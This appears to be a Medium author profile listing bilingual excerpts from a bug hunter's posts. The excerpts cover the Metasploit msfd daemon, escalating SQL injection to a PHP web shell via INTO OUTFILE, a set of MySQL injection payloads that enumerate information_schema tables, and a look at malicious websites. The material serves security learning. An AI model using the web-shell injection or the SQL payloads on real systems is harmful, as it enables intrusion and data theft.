Sign in

My name is Luis Madero (_Y000! _) I am a computer systems engineer, bug hunter and above all a lover of web security, in this writing I would like to touch on the topic of xss injections from a theoretical point of view until I see some examples of injections along the history.


msfd — Provides an instance of msfconsole that remote clients can connect to

root@kali:~# msfd -h

Usage: msfd <options>

OPTIONS:

-A <opt> Specify list of hosts allowed to connect
-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-q Do not print the banner on startup
-s Use SSL

https://tools.kali.org/exploitation-tools/metasploit-framework

Msfd allows us to connect to a metasploit session no matter what machine we are on, just by having the…


Para empezar, primero tenemos que hablar del servicio “Msfd”

msfd — Provides an instance of msfconsole that remote clients can connect to

root@kali:~# msfd -h

Usage: msfd <options>

OPTIONS:

-A <opt> Specify list of hosts allowed to connect
-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-q Do not print the banner on startup
-s Use SSL

https://tools.kali.org/exploitation-tools/metasploit-framework

Msfd nos permite conectarnos a una sesión de metasploit sin importar…


In this case we are going to take advantage of a sql injection error to be able to “jump” to other vulnerabilities.

For this we have to have write permissions and know the path where the server is mounted, they can do it with an @@datadir, in this case I have the path on the error screen

After having the path, what we are going to do is inject the shell, in this case it is a simple backdoor in php:

‘<? php system ($ _ GET [“cmd”]); ?> ‘

We are going to inject it using:

INTO + OUTFILE…


En este caso vamos a aprovechar un error de sql inyection para poder “saltar” a otras vulnerabilidades.

Después de tener la ruta, lo que vamos a hacer es inyectar la shell, en este caso es una simple backdoor en php:

‘<?php system($_GET[“cmd”]); ?>’

Lo vamos a inyectar usando:

INTO+OUTFILE+’ruta/nombre.php’

Inyectan y se nos cargara el archivo en el server, ahora accedemos.


Inyecciónes sql usando funciones sql

Sql inyection payload usando la función RPAD y SOUNDS LIKE

SELECT RPAD(table_name,50,'.') from information_schema.tables where table_schema sounds like database()

Sql inyection payload usando upper + reverse + right + sounds like para extraer información

select upper(reverse(right(reverse(table_name),100)))from information_schema.tables where table_schema sounds like database()

Sql inyection usando elt, doble Reverse, hex y unhex

Select unhex(hex(reverse(reverse(elt(1, table_Name))))) from information_schema.tables

Sql inyection case

SELECT CASE WHEN (1=1) THEN table_name ELSE '<a href=https://twitter.com/_Y000_>_Y00!_</a>' END from information_schema.tablesSELECT CASE 4 WHEN 1 THEN database() WHEN 2 THEN @@version WHEN 3 THEN table_name ELSE '_Y000!_' END FROM information_schema.tablesSELECT CASE WHEN 1>0 THEN table_name ELSE '_Y000!_' END FROM information_schema.tables

SQL IF Function

SELECT IF(STRCMP('1','1'),'_Y000!_',table_name) FROM information_schema.tablesselect IF(MID(@@version,1,1)='5',table_name,'_Y000!_') from information_schema.tables

SQL IFNULL

SELECT IFNULL(1+1/0,table_name) FROM information_schema.tables

SQL NULLIF

SELECT NULLIF(table_name,2) from information_schema.tables

Sql inyection payload usando upper + reverse + right + sounds like

select upper(reverse(right(reverse(table_name),100)))from information_schema.tables where table_schema sounds like database()


Nowadays it is crucial to know how to identify a malicious website from an official site, this is increasingly difficult due to the hard work that fraudulent sites have behind.

In this writing we are going to analyze some malicious sites that are dedicated to spreading malware for mobile devices and PCs.

What is a malicious website?

A malicious link is a seemingly reliable ‘link’ that, when clicking on it, redirects to a fake website that imitates being a legitimate official website. …


Hoy en día es crucial el saber identificar un sitio web malicioso de un sitio oficial, esto es cada vez más difícil por el arduo trabajo que tienen los sitios fraudulentos por atrás.

En este escrito vamos a analizar unos sitios maliciosos que se dedican a difundir malware para dispositivos mobiles y PC.

Qué es un sitio web malicioso?

Un enlace malicioso es un ‘link’ aparentemente fiable pero que, al pinchar en él, redirige a una web falsa que imita ser una web oficial legítima. …


On this occasion I would like to share some tools that can be very useful if you dedicate yourself to the search for vulnerabilities.


En esta ocasión me gustaría compartir algunas herramientas que te pueden ser muy útiles si te dedicas a la búsqueda de vulnerabilidades.

_Y000_

Hola, Bienvenido a mi perfil de Medium! Soy Y000! 😊 ¿Quién soy? 🤔 Bueno… soy yo jaja soy solo un apasionado por la seguridad informatica.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store